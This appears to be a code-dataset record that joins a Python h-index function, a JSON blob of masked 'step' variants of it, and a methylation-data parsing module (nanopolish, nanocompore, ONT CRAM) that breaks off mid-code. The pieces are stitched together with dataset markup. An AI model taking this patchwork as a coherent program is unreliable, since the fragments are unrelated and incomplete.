    citations.sort()
    for i in range(len(citations)):
        # len(citations) - i papers remain from index i onward; if the
        # least-cited of them has at least that many citations, that
        # remaining count is the h-index.
        if citations[i] >= len(citations) - i:
            return len(citations) - i
    # No paper reaches even one citation: the h-index is 0.
    # (The original fell off the loop and implicitly returned None here.)
    return 0


print(solution([3, 0, 6, 1, 5]))
<|reserved_special_token_1|>
def solution(citations):
    """Return the h-index of the given citation counts."""
    # Sort citations ascending (translated from Korean: "sort the citations").
    citations.sort()
    # Scan from the least-cited paper: len(citations) - i papers remain at
    # index i; the first index where the smallest remaining count covers
    # all remaining papers yields the h-index.
    # NOTE(review): falls through and returns None when no index qualifies
    # (e.g. an all-zero list) — callers may expect 0; confirm.
    for i in range(len(citations)):
        if citations[i] >= len(citations) - i: 
            return len(citations)-i 


print(solution([3,0,6,1,5]))
|
flexible
|
{
"blob_id": "0b3d6339faf9d66d4e1338599e4784fac0f63d3f",
"index": 5310,
"step-1": "<mask token>\n",
"step-2": "def solution(citations):\n citations.sort()\n for i in range(len(citations)):\n if citations[i] >= len(citations) - i:\n return len(citations) - i\n\n\n<mask token>\n",
"step-3": "def solution(citations):\n citations.sort()\n for i in range(len(citations)):\n if citations[i] >= len(citations) - i:\n return len(citations) - i\n\n\nprint(solution([3, 0, 6, 1, 5]))\n",
"step-4": "def solution(citations):\n # 사이테이션을 정렬\n citations.sort()\n # \n for i in range(len(citations)):\n if citations[i] >= len(citations) - i: \n return len(citations)-i \n\n\nprint(solution([3,0,6,1,5]))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pandas as pd
import pyranges as pr
import numpy as np
import sys
import logging
from methplotlib.utils import file_sniffer
import pysam
class Methylation(object):
    """Container bundling a parsed methylation table with its metadata.

    Attributes:
        table: the parsed data (typically a pandas DataFrame).
        data_type: source flavour, e.g. "nanopolish_freq" or "ont-cram".
        name: display label for this dataset.
        called_sites: number of calls the table was built from.
    """

    def __init__(self, table, data_type, name, called_sites):
        self.name = name
        self.data_type = data_type
        self.called_sites = called_sites
        self.table = table
def read_meth(filename, name, window, smoothen=5):
    """
    Load one methylation/modification file and wrap it in a Methylation object.

    Dispatches on the sniffed file type:
    - nanopolish* tables: either calculate_methylation_frequency output
      ('chromosome', 'pos', 'methylated_frequency', smoothed with a rolling
      average) or raw per-read calls, optionally phased ('read',
      'chromosome', 'pos', 'log_lik_ratio', 'strand')
    - nanocompore result tables
    - ONT CRAM files

    Prints a hint to stderr and re-raises when parsing fails.
    """
    file_type = file_sniffer(filename)
    logging.info("File is of type {}".format(file_type))
    try:
        if file_type.startswith("nanopolish"):
            return parse_nanopolish(filename, file_type, name, window,
                                    smoothen=smoothen)
        if file_type == "nanocompore":
            return parse_nanocompore(filename, name, window)
        if file_type == "ont-cram":
            return parse_ont_cram(filename, name, window)
    except Exception:
        sys.stderr.write("\n\n\nInput file {} not recognized!\n".format(filename))
        sys.stderr.write("\n\n\nDetailed error:\n")
        raise
def parse_nanopolish(filename, file_type, name, window, smoothen=5):
    """
    Parse nanopolish output into a Methylation object.

    Handles three flavours (file_type):
    - nanopolish_call / nanopolish_phased: per-read calls, returned sorted
      by read name and position.
    - nanopolish_freq: aggregated frequencies, averaged per position and
      smoothed with a centered rolling mean of width `smoothen`.

    `window`, when truthy, restricts the data to window.chromosome over
    [window.begin, window.end].
    """
    table = pd.read_csv(filename, sep="\t")
    # PyRanges expects its core columns to be named Chromosome/Start/End.
    gr = pr.PyRanges(table.rename(columns={"start": "Start", "chromosome": "Chromosome",
                                           "end": "End", "Strand": "strand"}))
    logging.info("Read the file in a dataframe.")
    if window:
        gr = gr[window.chromosome, window.begin:window.end]
    try:
        # Collapse each interval to a single position: the floored midpoint.
        gr.pos = np.floor(gr.drop().df[["Start", "End"]].mean(axis=1))
    except KeyError:
        # Most likely there are no rows left after windowing (see message).
        sys.stderr.write("\n\n\nProblem parsing nanopolish file {}!\n".format(filename))
        sys.stderr.write("Could it be that there are no calls in your selected window?\n")
        sys.stderr.write("\n\n\nDetailed error:\n")
        raise
    table = gr.df
    if file_type in ['nanopolish_call', 'nanopolish_phased']:
        # Keep only the columns needed for per-read plotting.
        table = table.drop(columns=['Start', 'End', 'log_lik_methylated',
                                    'log_lik_unmethylated', 'num_calling_strands',
                                    'num_motifs', 'sequence'])
        return Methylation(
            table=table.sort_values(['read_name', 'pos']),
            data_type=file_type,
            name=name,
            called_sites=len(table))
    if file_type == "nanopolish_freq":
        # Remember the per-row call counts before the columns are dropped.
        called_sites = table.called_sites
        table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',
                                    'called_sites', 'called_sites_methylated',
                                    'group_sequence'])
        # Average duplicate positions, then smooth with a centered rolling mean.
        return Methylation(
            table=table.sort_values('pos')
            .groupby('pos')
            .mean()
            .rolling(window=smoothen, center=True)
            .mean(),
            data_type=file_type,
            name=name,
            called_sites=called_sites.sum())
def parse_nanocompore(filename, name, window):
    """
    Parse a nanocompore results table into a Methylation object.

    Keeps only the coordinate columns and the p-value columns, optionally
    restricts rows to window.chromosome, and appends a sentinel row at
    window.end (p-values filled with 1.0) so plots span the full window.

    called_sites counts the real data rows (sentinel excluded).
    """
    def nanocompore_columns_of_interest(column):
        # Coordinates plus any plain or context_2 p-value column.
        if column in ['pos', 'ref_id']:
            return True
        return column.endswith('pvalue_context_2') or column.endswith('pvalue')

    table = pd.read_csv(filename, sep="\t", usecols=nanocompore_columns_of_interest)
    if window:
        table = table[table["ref_id"] == window.chromosome]
    called_sites = len(table)
    table = table.sort_values('pos')
    if window:
        # DataFrame.append() was removed in pandas 2.0; use pd.concat.
        # The sentinel row only carries 'pos'; its p-values become NaN and
        # are filled with 1.0 below. Guarding on `window` also fixes a
        # crash: the original read window.end unconditionally and failed
        # when window was None.
        table = pd.concat([table, pd.DataFrame([{'pos': window.end}])],
                          ignore_index=True)
    return Methylation(
        table=table.drop(columns="ref_id").fillna(1.0),
        data_type='nanocompore',
        name=name,
        called_sites=called_sites)
def parse_ont_cram(filename, name, window):
    """
    Extract per-read base-modification calls from an ONT CRAM file.

    Fetches primary alignments overlapping the window, decodes their
    MM/MP tags, and returns a Methylation object whose table has one row
    per (read, modified reference position).
    """
    cram = pysam.AlignmentFile(filename, "rc")
    records = []
    for aln in cram.fetch(reference=window.chromosome, start=window.begin, end=window.end):
        # Skip supplementary/secondary alignments: one record per read.
        if aln.is_supplementary or aln.is_secondary:
            continue
        mod, positions, probs = get_modified_reference_positions(aln)
        strand = '-' if aln.is_reverse else '+'
        for refpos, prob in zip(positions, probs):
            if refpos is None:
                continue
            records.append((aln.query_name, strand, refpos, prob, mod))
    return Methylation(
        table=pd.DataFrame(records, columns=['read_name', 'strand', 'pos', 'quality', 'mod'])
        .astype(dtype={'mod': 'category', 'quality': 'float'})
        .sort_values(['read_name', 'pos']),
        data_type="ont-cram",
        name=name,
        called_sites=len(records))
def get_modified_reference_positions(read):
    """
    Decode the MM/MP base-modification tags of an aligned read.

    Returns a (modification, reference_positions, probabilities) triple,
    or (None, [None], [None]) when the read carries no MM tag.
    """
    if read.has_tag('MM'):
        basemod = read.get_tag('MM').split(',', 1)[0]
        if '-' in basemod:
            sys.exit("ERROR: modifications on negative strand currently unsupported.")
        base, mod = basemod.split('+')
        deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]
        if not deltas:
            # An MM tag may declare a modification with no positions at
            # all; bail out early (the original fed len(deltas) - 1 == -1
            # into np.ones and crashed with a ValueError).
            return (basemod, [], [])
        probabilities = phred_to_probability(read.get_tag('MP'))
        # MM deltas count candidate bases to *skip*, so the candidate index
        # of the k-th modified base is cumsum(deltas)[k] + k (one step past
        # each previously modified base, per the SAM tags spec). The
        # original added +1 for every entry after the first, mis-decoding
        # the 3rd call onward.
        locations = np.cumsum(deltas) + np.arange(len(deltas))
        # Indices (in sequencing orientation) of every canonical base.
        base_index = np.array(
            [i for i, letter in enumerate(read.get_forward_sequence()) if letter == base]
        )
        modified_bases = base_index[locations]
        refpos = np.array(read.get_reference_positions(full_length=True))
        if read.is_reverse:
            # MM offsets count along the original (forward) sequence, so
            # flip reference coordinates and probabilities to match.
            refpos = np.flipud(refpos)
            probabilities = probabilities[::-1]
        return (basemod, refpos[modified_bases], probabilities)
    else:
        return (None, [None], [None])
def errs_tab(n):
    """Return the error probability for every quality value from 0 through n."""
    return [10 ** (-qual / 10) for qual in range(n + 1)]


def phred_to_probability(quals, tab=errs_tab(128)):
    """Map a Phred-encoded (offset 33) quality string to error probabilities.

    The lookup table is built once at import time and shared across calls.
    """
    return [tab[ord(char) - 33] for char in quals]
def get_data(methylation_files, names, window, smoothen=5):
    """
    Load methylation data (frequency or raw) from every file listed in
    methylation_files, restricted to the genomic interval in `window`.

    Frequencies are smoothened with a rolling window of size `smoothen`.
    Returns a list of Methylation objects, one per input file, paired with
    the corresponding entry of `names`.
    """
    paired = zip(methylation_files, names)
    return [read_meth(path, label, window, smoothen) for path, label in paired]
|
normal
|
{
"blob_id": "d654aea3da3e36ccde8a5f4e03798a0dea5aad8a",
"index": 510,
"step-1": "<mask token>\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\n<mask token>\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\n<mask token>\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in 
read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\n<mask token>\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep='\\t', usecols=\n 
nanocompore_columns_of_interest)\n if window:\n table = table[table['ref_id'] == window.chromosome]\n return Methylation(table=table.sort_values('pos').append({'pos': window\n .end}, ignore_index=True).drop(columns='ref_id').fillna(1.0),\n data_type='nanocompore', name=name, called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, 'rc')\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin,\n end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name, '-' if read.is_reverse else\n '+', pos, qual, mod))\n return Methylation(table=pd.DataFrame(data, columns=['read_name',\n 'strand', 'pos', 'quality', 'mod']).astype(dtype={'mod': 'category',\n 'quality': 'float'}).sort_values(['read_name', 'pos']), data_type=\n 'ont-cram', name=name, called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities 
less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\n<mask token>\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(\n methylation_files, names)]\n",
"step-3": "<mask token>\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\ndef read_meth(filename, name, window, smoothen=5):\n \"\"\"\n converts a file from nanopolish to a pandas dataframe\n input can be from calculate_methylation_frequency\n which will return a dataframe with 'chromosome', 'pos', 'methylated_frequency'\n smoothening the result by a rolling average\n\n input can also be raw data per read, optionally phased\n which will return a dataframe with 'read', 'chromosome', 'pos', 'log_lik_ratio', 'strand'\n \"\"\"\n file_type = file_sniffer(filename)\n logging.info('File is of type {}'.format(file_type))\n try:\n if file_type.startswith('nanopolish'):\n return parse_nanopolish(filename, file_type, name, window,\n smoothen=smoothen)\n elif file_type == 'nanocompore':\n return parse_nanocompore(filename, name, window)\n elif file_type == 'ont-cram':\n return parse_ont_cram(filename, name, window)\n except Exception:\n sys.stderr.write('\\n\\n\\nInput file {} not recognized!\\n'.format(\n filename))\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n 
table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep='\\t', usecols=\n nanocompore_columns_of_interest)\n if window:\n table = table[table['ref_id'] == window.chromosome]\n return Methylation(table=table.sort_values('pos').append({'pos': window\n .end}, ignore_index=True).drop(columns='ref_id').fillna(1.0),\n data_type='nanocompore', name=name, called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, 'rc')\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin,\n end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name, '-' if read.is_reverse else\n '+', pos, qual, mod))\n return Methylation(table=pd.DataFrame(data, columns=['read_name',\n 'strand', 'pos', 'quality', 'mod']).astype(dtype={'mod': 'category',\n 'quality': 'float'}).sort_values(['read_name', 'pos']), data_type=\n 'ont-cram', name=name, 
called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\ndef phred_to_probability(quals, tab=errs_tab(128)):\n return [tab[ord(q) - 33] for q in quals]\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(\n methylation_files, names)]\n",
"step-4": "import pandas as pd\nimport pyranges as pr\nimport numpy as np\nimport sys\nimport logging\nfrom methplotlib.utils import file_sniffer\nimport pysam\n\n\nclass Methylation(object):\n\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\ndef read_meth(filename, name, window, smoothen=5):\n \"\"\"\n converts a file from nanopolish to a pandas dataframe\n input can be from calculate_methylation_frequency\n which will return a dataframe with 'chromosome', 'pos', 'methylated_frequency'\n smoothening the result by a rolling average\n\n input can also be raw data per read, optionally phased\n which will return a dataframe with 'read', 'chromosome', 'pos', 'log_lik_ratio', 'strand'\n \"\"\"\n file_type = file_sniffer(filename)\n logging.info('File is of type {}'.format(file_type))\n try:\n if file_type.startswith('nanopolish'):\n return parse_nanopolish(filename, file_type, name, window,\n smoothen=smoothen)\n elif file_type == 'nanocompore':\n return parse_nanocompore(filename, name, window)\n elif file_type == 'ont-cram':\n return parse_ont_cram(filename, name, window)\n except Exception:\n sys.stderr.write('\\n\\n\\nInput file {} not recognized!\\n'.format(\n filename))\n sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep='\\t')\n gr = pr.PyRanges(table.rename(columns={'start': 'Start', 'chromosome':\n 'Chromosome', 'end': 'End', 'Strand': 'strand'}))\n logging.info('Read the file in a dataframe.')\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[['Start', 'End']].mean(axis=1))\n except KeyError:\n sys.stderr.write('\\n\\n\\nProblem parsing nanopolish file {}!\\n'.\n format(filename))\n sys.stderr.write(\n 'Could it be that there are no calls in your selected window?\\n')\n 
sys.stderr.write('\\n\\n\\nDetailed error:\\n')\n raise\n table = gr.df\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep='\\t', usecols=\n nanocompore_columns_of_interest)\n if window:\n table = table[table['ref_id'] == window.chromosome]\n return Methylation(table=table.sort_values('pos').append({'pos': window\n .end}, ignore_index=True).drop(columns='ref_id').fillna(1.0),\n data_type='nanocompore', name=name, called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, 'rc')\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin,\n end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name, '-' if read.is_reverse else\n '+', pos, qual, mod))\n return Methylation(table=pd.DataFrame(data, columns=['read_name',\n 'strand', 'pos', 'quality', 
'mod']).astype(dtype={'mod': 'category',\n 'quality': 'float'}).sort_values(['read_name', 'pos']), data_type=\n 'ont-cram', name=name, called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\ndef phred_to_probability(quals, tab=errs_tab(128)):\n return [tab[ord(q) - 33] for q in quals]\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(\n methylation_files, names)]\n",
"step-5": "import pandas as pd\nimport pyranges as pr\nimport numpy as np\nimport sys\nimport logging\nfrom methplotlib.utils import file_sniffer\nimport pysam\n\n\nclass Methylation(object):\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\ndef read_meth(filename, name, window, smoothen=5):\n \"\"\"\n converts a file from nanopolish to a pandas dataframe\n input can be from calculate_methylation_frequency\n which will return a dataframe with 'chromosome', 'pos', 'methylated_frequency'\n smoothening the result by a rolling average\n\n input can also be raw data per read, optionally phased\n which will return a dataframe with 'read', 'chromosome', 'pos', 'log_lik_ratio', 'strand'\n \"\"\"\n file_type = file_sniffer(filename)\n logging.info(\"File is of type {}\".format(file_type))\n try:\n if file_type.startswith(\"nanopolish\"):\n return parse_nanopolish(filename, file_type, name, window, smoothen=smoothen)\n elif file_type == \"nanocompore\":\n return parse_nanocompore(filename, name, window)\n elif file_type == \"ont-cram\":\n return parse_ont_cram(filename, name, window)\n except Exception:\n sys.stderr.write(\"\\n\\n\\nInput file {} not recognized!\\n\".format(filename))\n sys.stderr.write(\"\\n\\n\\nDetailed error:\\n\")\n raise\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep=\"\\t\")\n gr = pr.PyRanges(table.rename(columns={\"start\": \"Start\", \"chromosome\": \"Chromosome\",\n \"end\": \"End\", \"Strand\": \"strand\"}))\n logging.info(\"Read the file in a dataframe.\")\n\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[[\"Start\", \"End\"]].mean(axis=1))\n except KeyError:\n sys.stderr.write(\"\\n\\n\\nProblem parsing nanopolish file {}!\\n\".format(filename))\n sys.stderr.write(\"Could it be that there are no calls in 
your selected window?\\n\")\n sys.stderr.write(\"\\n\\n\\nDetailed error:\\n\")\n raise\n\n table = gr.df\n\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands',\n 'num_motifs', 'sequence'])\n return Methylation(\n table=table.sort_values(['read_name', 'pos']),\n data_type=file_type,\n name=name,\n called_sites=len(table))\n if file_type == \"nanopolish_freq\":\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated',\n 'group_sequence'])\n return Methylation(\n table=table.sort_values('pos')\n .groupby('pos')\n .mean()\n .rolling(window=smoothen, center=True)\n .mean(),\n data_type=file_type,\n name=name,\n called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep=\"\\t\", usecols=nanocompore_columns_of_interest)\n if window:\n table = table[table[\"ref_id\"] == window.chromosome]\n return Methylation(\n table=table.sort_values('pos')\n .append({'pos': window.end}, ignore_index=True)\n .drop(columns=\"ref_id\")\n .fillna(1.0),\n data_type='nanocompore',\n name=name,\n called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, \"rc\")\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin, end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name,\n '-' if read.is_reverse else '+',\n pos,\n qual,\n mod))\n return Methylation(\n 
